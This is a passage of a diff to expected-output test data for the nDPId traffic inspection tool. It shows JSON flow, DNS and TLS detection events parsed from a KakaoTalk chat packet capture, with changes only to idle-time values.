{"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"graph.facebook.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"31.13.68.70"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":119,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031042,"flow_last_seen":1430069031042,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069031042,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.70","src_port":43581,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1430069031042,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069031042,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADx6qUAAPwYA7AoYUrwfDURGqj0Bu4p9cZMAAAAAoAI5CJu+AAACBAV4BAIICgALCzoAAAAAAQMDBw=="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1430069031079,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069031079,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACwwtUAA+AaR7x8NREYKGFK8AbuqPWAZ05aKfXGUYBIRHOtUAAACBAV4"} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1430069031083,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069031083,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACh6qkAAPwYA\/woYUrwfDURGqj0Bu4p9cZRgGdOXUBA5CNrpAAA="} -00976{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":123,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069031042,"flow_last_seen":1430069031083,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":565,"flow_tot_l4_payload_len":565,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1430069031083,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.70","src_port":43581,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"graph.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":119,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031042,"flow_last_seen":1430069031042,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069031042,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.70","src_port":43581,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1430069031042,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069031042,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADx6qUAAPwYA7AoYUrwfDURGqj0Bu4p9cZMAAAAAoAI5CJu+AAACBAV4BAIICgALCzoAAAAAAQMDBw=="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1430069031079,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069031079,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACwwtUAA+AaR7x8NREYKGFK8AbuqPWAZ05aKfXGUYBIRHOtUAAACBAV4"} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1430069031083,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069031083,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACh6qkAAPwYA\/woYUrwfDURGqj0Bu4p9cZRgGdOXUBA5CNrpAAA="} +00976{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":123,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069031042,"flow_last_seen":1430069031083,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":565,"flow_tot_l4_payload_len":565,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1430069031083,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.70","src_port":43581,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"graph.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":127,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031167,"flow_last_seen":1430069031167,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1430069031167,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":4017,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":127,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1430069031167,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":85,"pkt_l4_len":49,"thread_ts_msec":1430069031167,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAEUAAEAAQBHSFwoYUrwKvAEBD7EANQAxznCJ\/wEAAAEAAAAAAAAKZGV2ZWxvcGVycwhmYWNlYm9vawNjb20AAAEAAQ=="} 00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":127,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031167,"flow_last_seen":1430069031167,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1430069031167,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":4017,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"developers.facebook.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -01034{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":132,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069031042,"flow_last_seen":1430069031203,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1845,"flow_avg_l4_payload_len":263,"midstream":0,"thread_ts_msec":1430069031203,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.70","src_port":43581,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"graph.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256"}} -01824{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":138,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1430069031042,"flow_last_seen":1430069031220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":4136,"flow_avg_l4_payload_len":344,"midstream":0,"thread_ts_msec":1430069031220,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.70","src_port":43581,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"graph.facebook.com","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}} +01034{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":132,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069031042,"flow_last_seen":1430069031203,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1845,"flow_avg_l4_payload_len":263,"midstream":0,"thread_ts_msec":1430069031203,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.70","src_port":43581,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"graph.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256"}} +01824{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":138,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1430069031042,"flow_last_seen":1430069031220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":4136,"flow_avg_l4_payload_len":344,"midstream":0,"thread_ts_msec":1430069031220,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.70","src_port":43581,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"graph.facebook.com","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}} 00581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1430069031221,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":144,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":144,"pkt_l4_len":108,"thread_ts_msec":1430069031221,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAIDtrgAANREvLgq8AQEKGFK8ADUPsQBsjjKJ\/4GAAAEAAwAAAAAKZGV2ZWxvcGVycwhmYWNlYm9vawNjb20AAAEAAcAMAAUAAQAAA+oABwRzdGFywBfANQAFAAEAAAPqAAwEc3RhcgRjMTBywBfASAABAAEAAAAIAAQfDURU"} 00802{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":139,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069031167,"flow_last_seen":1430069031221,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1430069031221,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":4017,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"developers.facebook.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"31.13.68.84"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":144,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031230,"flow_last_seen":1430069031230,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1430069031230,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":14650,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1430069031230,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":87,"pkt_l4_len":51,"thread_ts_msec":1430069031230,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAEcAAEAAQBHSFQoYUrwKvAEBOToANQAzWvOyogEAAAEAAAAAAAABMgI5NwMyNTIDMTczB2luLWFkZHIEYXJwYQAADAAB"} 00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":144,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031230,"flow_last_seen":1430069031230,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1430069031230,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":14650,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"2.97.252.173.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":146,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031236,"flow_last_seen":1430069031236,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069031236,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45211,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":146,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1430069031236,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069031236,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADxjDkAAPwYYeQoYUrwfDURUsJsBu8tPaEMAAAAAoAI5CF29AAACBAV4BAIICgALC00AAAAAAQMDBw=="} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":146,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031236,"flow_last_seen":1430069031236,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069031236,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45211,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":146,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1430069031236,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069031236,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADxjDkAAPwYYeQoYUrwfDURUsJsBu8tPaEMAAAAAoAI5CF29AAACBAV4BAIICgALC00AAAAAAQMDBw=="} 00563{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":147,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1430069031281,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":130,"pkt_l4_len":94,"thread_ts_msec":1430069031281,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAHLtrwAANREvOwq8AQEKGFK8ADU5OgBeI2eyooGAAAEAAQAAAAABMgI5NwMyNTIDMTczB2luLWFkZHIEYXJwYQAADAABwAwADAABAAAEYQAfEG1xdHQtc2h2LTE0LWZyYzEIZmFjZWJvb2sDY29tAA=="} 00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":147,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069031230,"flow_last_seen":1430069031281,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1430069031281,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":14650,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"2.97.252.173.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":148,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1430069031281,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069031281,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACw2WEAA+AaMPh8NRFQKGFK8Abuwm2JwnlDLT2hEYBIRHOBVAAACBAV4"} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":149,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1430069031284,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069031284,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAChjD0AAPwYYjAoYUrwfDURUsJsBu8tPaERicJ5RUBA5CM\/qAAA="} -00981{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":150,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069031236,"flow_last_seen":1430069031286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":570,"flow_tot_l4_payload_len":570,"flow_avg_l4_payload_len":142,"midstream":0,"thread_ts_msec":1430069031286,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"developers.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01039{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":161,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069031236,"flow_last_seen":1430069031391,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1850,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1430069031391,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"developers.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256"}} -01829{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":164,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1430069031236,"flow_last_seen":1430069031408,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":4141,"flow_avg_l4_payload_len":414,"midstream":0,"thread_ts_msec":1430069031408,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"developers.facebook.com","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}} 